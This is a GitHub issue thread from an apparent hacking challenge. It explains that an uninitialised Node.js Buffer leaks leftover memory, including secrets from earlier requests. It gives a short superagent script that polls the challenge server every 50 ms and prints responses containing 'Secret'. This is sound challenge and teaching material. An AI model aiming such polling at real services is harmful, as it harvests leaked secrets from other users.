### ISSUE TITLE
Not BEARSANDSALMONS

### ISSUE THREAD

**Issue by suhk** [codefellows/cf-hack-challenge-1#8]
manbearbig1337h4x0rzzz

Since you initialize Buffer(256) without filling it with anything, it fills it with other things in memory (such as 'secret') so it's a matter of just pinging the server and checking the response over and over again to see if there was anything with "Secret".

```
const http = require('http');
const superagent = require('superagent');

var str = '';

var t = setInterval(function() {
  superagent
    .post('cf-hack-challenge-1.herokuapp.com')
    .send(str)
    .end(function(err, res) {
      if(res.text.match('Secret') || new Buffer(res.text, 'base64').toString('ascii').match('Secret')) {
        console.log(res.text);
      }
    });
}, 50);
```

**Comment by sunny-mittal** [comment]
I think it's important to note that if the resBuffer contains the secret, it has nothing to do with the secret that was set during the same request, but one that was left in memory from a previous request.
